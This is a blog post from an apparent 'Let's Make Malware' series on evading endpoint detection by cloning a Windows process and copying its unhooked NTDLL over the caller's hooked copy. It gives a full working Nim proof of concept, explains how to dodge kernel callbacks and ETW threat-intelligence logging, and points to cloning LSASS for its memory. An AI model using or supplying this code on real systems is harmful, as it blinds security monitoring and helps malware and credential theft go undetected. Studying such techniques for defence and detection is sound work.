Attack of The Clones - Unhooking and Syscall Stubs
Introduction
Today, we are going to return to our discussion on unhooking. In our Let’s Make Malware - Bypassing Behavioral Detections (Hooks and Trampolines) post, we talked about what function hooking is, how EDRs utilize it, and two methods for unhooking functions.
The main method we covered in that post was unhooking from files on disk, and we briefly touched on unhooking from suspended processes (also called the Perun’s Fart technique).
There are, of course, other ways to do this, such as unhooking from KnownDlls or from remote servers.
Unhooking from a suspended process allows us to avoid the pitfalls of opening a handle to NTDLL.dll on-disk and mapping it, but what if we could improve upon this technique further?
That’s exactly what we will look into accomplishing.
Unhooking from Suspended Processes
As we discussed in the post on hooks and trampolines, unhooking from suspended processes works because NTDLL.dll is one of the first DLLs to be loaded during process initialization. If we create a suspended process, we are halting its initialization right after this DLL has been loaded and prior to any others.
This means EDRs/AVs have not loaded their DLLs yet and thus have not hooked the functions within NTDLL.
A suspended process on its own is not inherently suspicious. However, a process that starts out suspended does get some scrutiny. The problem is that, to get a clean, unhooked copy of NTDLL in the first place, we cannot suspend our sacrificial process later. It must be suspended from the start.
On top of that, we have kernel callbacks, parent-child process relationships, and ETW (TI) to consider.
So, what can we do?
Enter Process Cloning
We can clone/fork the process! This lesser-known feature of Windows does not get enough love. There is a lot of potential here.
A process clone/fork is exactly what it sounds like: a nearly identical copy of a process. Two excellent posts have already been written about this functionality and will be linked in the resources section, so we won’t dive too deep into it here.
What’s important to note is that process cloning allows us to get a clean copy of NTDLL. This is because the clone gets a copy of the original’s virtual memory address space.
So, not only do we get NTDLL, but we also get many of the other DLLs as well (and other goodies if we clone processes like LSASS).
So, why is this an improvement over suspended processes?
First, cloned processes (using the NtCreateProcessEx function rather than NtCreateUserProcess) do not create/clone threads automatically. Because of this, process/thread creation kernel callbacks do not trigger.
So, we have a ghost process as far as endpoint protection is concerned. Task Manager will not show these cloned processes.
Second, the clone is a child of the original process. This fixes any parent-child process anomalies.
Problems with Cloning
While this is an improvement over suspended processes, there are still some considerations to keep in mind.
The biggest is that we cannot clone just any process. If we clone a process that already has the EDR’s DLLs loaded and its copy of NTDLL is hooked, we end up replacing our process’s hooked NTDLL with another hooked NTDLL.
For that reason, we must ensure that the process we clone does not have the EDR’s DLLs loaded. We could create a suspended process just to clone it. From the EDR’s perspective, a suspicious activity occurred (process created initially suspended) but nothing else happened afterwards.
This would be a somewhat valid approach (we will discuss why only “somewhat” valid in a moment).
We could also enumerate all processes currently running and find one without the EDR’s DLLs. We can do this either manually or programmatically.
Otherwise, we can take a somewhat lazy approach and assume that the EDR won’t/can’t load DLLs into certain processes.
Fortunately for us, this is the case. Protected processes like lsass and services.exe do not seem to be touched by EDRs. However, we also cannot touch them.
Svchost looks like a valid target as does msedge, msteams, and dllhost.
Note: target processes that fit our criteria may vary.
The next problem is that although no kernel callbacks have been triggered by the creation of the cloned process, it isn’t entirely invisible.
NtCreateProcessEx is likely hooked itself, and through callstack analysis, EDRs can see that a process (which can be identified through the parent-process handle function argument) is being created/cloned.
This is also why creating a process just to clone it is only a “somewhat valid approach”.
Fortunately, this is easy enough to get around as we have the option of using syscalls or trampolines here.
However, we then run into the issue of reading a remote process’s virtual memory. Endpoint protection can also use callstack analysis here to identify our cloned process.
This issue is not specific to process cloning, but it is a consideration that must be made.
We can avoid the hook that is likely on the ReadProcessMemory/NtReadVirtualMemory function by again using syscalls or trampolines, but ETW TI will still log this action of reading a remote process’s virtual memory.
Normally, bypassing ETW TI would require us to be in kernel-mode, but once again we are in luck as new research has shown that we can get around parts of ETW TI (like reading virtual memory from a remote process) from userland if we have SE_DEBUG_PRIVILEGE enabled and are running some versions of Windows 10. This excellent post will also be linked in the resources section.
Proof of Concept
So, what does all this look like in code?
Well, it looks mostly identical to code for unhooking from a suspended process. Note: this code is also available here
    import winim
    import ptr_math
    import std/dynlib
    import std/[strformat, strutils]  # fmt"" strings and integer toHex

    # NtCreateProcessEx is not declared in the Windows headers, so we describe its signature ourselves.
    type NtCreateProcessEx_t = proc(ProcessHandle: PHANDLE, DesiredAccess: ACCESS_MASK, ObjectAttributes: POBJECT_ATTRIBUTES, ParentProcess: HANDLE, Flags: ULONG, SectionHandle: HANDLE, DebugPort: HANDLE, ExceptionPort: HANDLE, InJob: BOOLEAN): NTSTATUS {.stdcall.}

    # Convert a byte array (such as a section name) to a Nim string.
    proc toString(bytes: openarray[byte]): string =
      result = newString(bytes.len)
      copyMem(result[0].addr, bytes[0].unsafeAddr, bytes.len)

    proc getCleanNTDLL(): LPVOID =
      var hNtdll = loadLib("ntdll.dll")
      var status: NTSTATUS
      var procOA: OBJECT_ATTRIBUTES
      var hClone: HANDLE
      var pNtdll: LPVOID
      var NtCreateProcessEx = cast[NtCreateProcessEx_t](hNtdll.symAddr("NtCreateProcessEx"))
      # 8648 is the PID of the process to clone; change it to one that exists on the target system.
      var hPowershell = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, 8648)
      InitializeObjectAttributes(addr procOA, NULL, 0, cast[HANDLE](NULL), NULL)
      status = NtCreateProcessEx(addr hClone, PROCESS_ALL_ACCESS, addr procOA, hPowershell, cast[ULONG](0), cast[HANDLE](NULL), cast[HANDLE](NULL), cast[HANDLE](NULL), FALSE)
      if NT_SUCCESS(status):
        echo "[+] Successfully Cloned!\n[!]New PID: ", GetProcessId(hClone), "\n"
      else:
        echo "[-] Error Cloning Process! Error Code: 0x", toHex(status)
      # Find the base address and size of NTDLL in our own process.
      var mi = MODULEINFO()
      let ntdllModule = GetModuleHandleA("ntdll.dll")
      GetModuleInformation(cast[HANDLE](-1), ntdllModule, addr mi, cast[DWORD](sizeof(mi)))
      pntdll = HeapAlloc(GetProcessHeap(), 0, mi.SizeOfImage)
      # Read the clone's copy of NTDLL from that same address into our heap buffer.
      var dwRead: SIZE_T
      let bSuccess = ReadProcessMemory(hClone, cast[LPCVOID](mi.lpBaseOfDll), pNtdll, mi.SizeOfImage, addr dwRead)
      if bSuccess == 0:
        echo "Failed in reading ntdll: ", GetLastError()
        quit(QuitFailure)
      return pntdll

    proc unhook(cleanNtdll: LPVOID): bool =
      var
        oldprotect: DWORD = 0
        SectionHeader: PIMAGE_SECTION_HEADER
      let low: uint16 = 0
      let hNtdll: HMODULE = GetModuleHandleA("ntdll.dll")
      let DOSHeader: PIMAGE_DOS_HEADER = cast[PIMAGE_DOS_HEADER](cleanNtdll)
      let NtHeader: PIMAGE_NT_HEADERS = cast[PIMAGE_NT_HEADERS](cast[DWORD_PTR](cleanNtdll) + DOSHeader.e_lfanew)
      for Section in low ..< NtHeader.FileHeader.NumberOfSections:
        SectionHeader = cast[PIMAGE_SECTION_HEADER](cast[DWORD_PTR](IMAGE_FIRST_SECTION(NtHeader)) + cast[DWORD_PTR](IMAGE_SIZEOF_SECTION_HEADER * Section))
        if cmp(".text", toString(SectionHeader.Name)) == 0:
          echo "Found .text section"
          if VirtualProtect(cast[LPVOID](hNtdll + SectionHeader.VirtualAddress), SectionHeader.Misc.VirtualSize, 0x40, addr oldprotect) == 0: #0x40 = PAGE_EXECUTE_READWRITE
            echo fmt"VirtualProtect Failed! Error Code: ({GetLastError()})."
            return false
          copyMem(cast[LPVOID](hNtdll + SectionHeader.VirtualAddress), cleanNtdll + SectionHeader.VirtualAddress, SectionHeader.Misc.VirtualSize)
          if VirtualProtect(cast[LPVOID](hNtdll + SectionHeader.VirtualAddress), SectionHeader.Misc.VirtualSize, oldprotect, addr oldprotect) == 0:
            echo fmt"VirtualProtect Failed! Error Code: ({GetLastError()})."
            return false
          return true
      return false

    when isMainModule:
      echo "Press any key to continue..."
      discard readLine(stdin)
      let nt = getCleanNTDLL()
      echo "Clean NTDLL Stored At: 0x", toHex(cast[ByteAddress](nt))
      echo "Press any key to continue..."
      discard readLine(stdin)
      echo "Unhooking!"
      let unhookResult = unhook(nt)
      if unhookResult:
        echo "NTDLL Has Been Refreshed!"
      else:
        echo "Could Not Refresh NTDLL!"
      echo "Press any key to quit..."
      discard readLine(stdin)
Let’s go through this Nim code piece by piece.
First, since NtCreateProcessEx is an undocumented function, we cannot simply call it. We have to define its function signature ourselves. This is the line starting with type.
Second, we create a convenience function. This is our “toString” function (credits to the Offensive Nim repo and @byt3bl33d3r). All we do here is convert a byte array to a Nim String type.
Next, we have our “getCleanNTDLL” function. The first thing it does is get a handle to ntdll.dll. Then, using this handle, we find and save the address of the NtCreateProcessEx function so we can use it.
Next, we get a handle to an arbitrary process. This will be the process we clone.
Note that the final parameter to OpenProcess is a PID, so we must make sure to change this to a value that exists on the target system. Alternatively, we can implement a function to look it up automatically.
Next, we call NtCreateProcessEx to clone the process and get back a handle to the new process.
Then, we find the base address and size of NTDLL.dll in our own process. Luckily for us, NTDLL.dll is generally mapped at the same base address in every process of the same bitness for a given boot, so by knowing where it is in our own process, we know where it is in other processes as well.
Once we have that information, we read the copy of NTDLL.dll from the cloned process and save it in heap memory.
Our unhook function takes the base address of our heap memory (that contains the clean copy of NTDLL.dll) and parses through it. It looks for the .text section, which contains all the instructions for the various functions we want to use, and then it overwrites our own process’s .text section with this clean copy.
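To make the header walk concrete, here is a minimal sketch of the same .text lookup done on a plain byte buffer instead of through winim's pointer types. The names findSection, SectionInfo, and demoImage are hypothetical helpers made up for this illustration, and demoImage builds a tiny synthetic header rather than a real DLL. The offsets follow the standard PE layout: e_lfanew at 0x3C, a 4-byte signature, a 20-byte file header, then the optional header and the 40-byte section headers.

```nim
import std/options

type SectionInfo = object
  virtualAddress: uint32
  virtualSize: uint32

proc readU16(buf: openArray[byte], off: int): uint16 =
  ## Little-endian 16-bit read.
  uint16(buf[off]) or (uint16(buf[off + 1]) shl 8)

proc readU32(buf: openArray[byte], off: int): uint32 =
  ## Little-endian 32-bit read.
  uint32(buf[off]) or (uint32(buf[off + 1]) shl 8) or
    (uint32(buf[off + 2]) shl 16) or (uint32(buf[off + 3]) shl 24)

proc sectionName(buf: openArray[byte], off: int): string =
  ## The 8-byte Name field is NUL-padded, so stop at the first zero byte.
  for i in 0 ..< 8:
    if buf[off + i] == 0: break
    result.add char(buf[off + i])

proc findSection(image: openArray[byte], name: string): Option[SectionInfo] =
  ## Hypothetical helper: locate a section by name in a mapped PE image.
  if image.len < 0x40 or image[0] != byte('M') or image[1] != byte('Z'):
    return none(SectionInfo)
  let ntOff = int(readU32(image, 0x3C))            # e_lfanew
  if ntOff + 24 > image.len: return none(SectionInfo)
  if image[ntOff] != byte('P') or image[ntOff + 1] != byte('E'):
    return none(SectionInfo)
  let count = int(readU16(image, ntOff + 6))       # NumberOfSections
  let optSize = int(readU16(image, ntOff + 20))    # SizeOfOptionalHeader
  let first = ntOff + 24 + optSize                 # first section header
  for i in 0 ..< count:
    let off = first + i * 40                       # each header is 40 bytes
    if off + 40 > image.len: break
    if sectionName(image, off) == name:
      return some(SectionInfo(virtualAddress: readU32(image, off + 12),
                              virtualSize: readU32(image, off + 8)))
  none(SectionInfo)

proc demoImage(): seq[byte] =
  ## Synthetic header for illustration only: one ".text" section,
  ## no optional header, VirtualAddress 0x1000, VirtualSize 0x2000.
  result = newSeq[byte](0x40 + 24 + 40)
  result[0] = byte('M'); result[1] = byte('Z')
  result[0x3C] = 0x40
  result[0x40] = byte('P'); result[0x41] = byte('E')
  result[0x46] = 1
  let sec = 0x40 + 24
  for i, c in ".text": result[sec + i] = byte(c)
  result[sec + 9] = 0x20
  result[sec + 13] = 0x10

when isMainModule:
  let info = findSection(demoImage(), ".text")
  if info.isSome:
    echo "Found .text, size: ", info.get.virtualSize
```

One detail worth noticing is that the section name is padded with NUL bytes to eight characters, so the sketch strips the padding before comparing names.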
Now, we can safely use NT API functions to do whatever our hearts desire.
Of course, we aren’t limited to just unhooking functions. We can also use this method to save syscall stubs or IDs.
To drive the point home, if we look at NTDLL.dll in our own process at the start, we can see that NtOpenProcess (as well as others) does not look normal. The first instruction is jmp whereas it should be mov r10, rcx. This is how we know this function is hooked by the AV.
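The same check can be sketched in code. The snippet below is a rough illustration, assuming the common x64 stub layout where a clean stub begins with mov r10, rcx (4C 8B D1) followed by mov eax, imm32 (B8 plus a 4-byte syscall number), and where the hook is a near jmp (E9) placed on the first instruction. The names classifyStub, syscallNumber, and StubState are hypothetical, the byte arrays are hand-written samples rather than dumps from a real system, and hooks that use a different pattern would simply land in the unknown bucket.

```nim
import std/options

type StubState = enum
  stubClean, stubJmpHook, stubUnknown

proc classifyStub(stub: openArray[byte]): StubState =
  ## Hypothetical helper: inspect the first bytes of an Nt* stub.
  if stub.len < 8: return stubUnknown
  # 4C 8B D1 = mov r10, rcx ; B8 = mov eax, imm32
  if stub[0] == 0x4C and stub[1] == 0x8B and stub[2] == 0xD1 and stub[3] == 0xB8:
    return stubClean
  # E9 rel32 = near jmp, the inline-hook pattern described above
  if stub[0] == 0xE9: return stubJmpHook
  stubUnknown

proc syscallNumber(stub: openArray[byte]): Option[uint32] =
  ## Reads the little-endian imm32 that follows B8, for clean stubs only.
  if classifyStub(stub) != stubClean: return none(uint32)
  some(uint32(stub[4]) or (uint32(stub[5]) shl 8) or
       (uint32(stub[6]) shl 16) or (uint32(stub[7]) shl 24))

when isMainModule:
  # Sample bytes for illustration; 0x26 is an arbitrary example number.
  let clean = [0x4C'u8, 0x8B, 0xD1, 0xB8, 0x26, 0x00, 0x00, 0x00]
  let hooked = [0xE9'u8, 0x10, 0x20, 0x30, 0x40, 0xCC, 0xCC, 0xCC]
  echo classifyStub(clean), " ", classifyStub(hooked)
```

Run against the first eight bytes of each exported Nt* function, a check like this gives a quick before-and-after comparison of our own NTDLL and the copy taken from the clone.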
After we clone our target process and steal its clean copy of NTDLL.dll, we, of course, notice that NtOpenProcess looks as it should. Also, note that our clone does not have a copy of the AV’s DLLs (atcuf64.dll and bdhkm64.dll), as the original did not.
The sky is the limit when it comes to cloning/forking processes.
Resources
Bill Demirkapi - Abusing Windows Implementation of Fork for Stealthy Memory Operations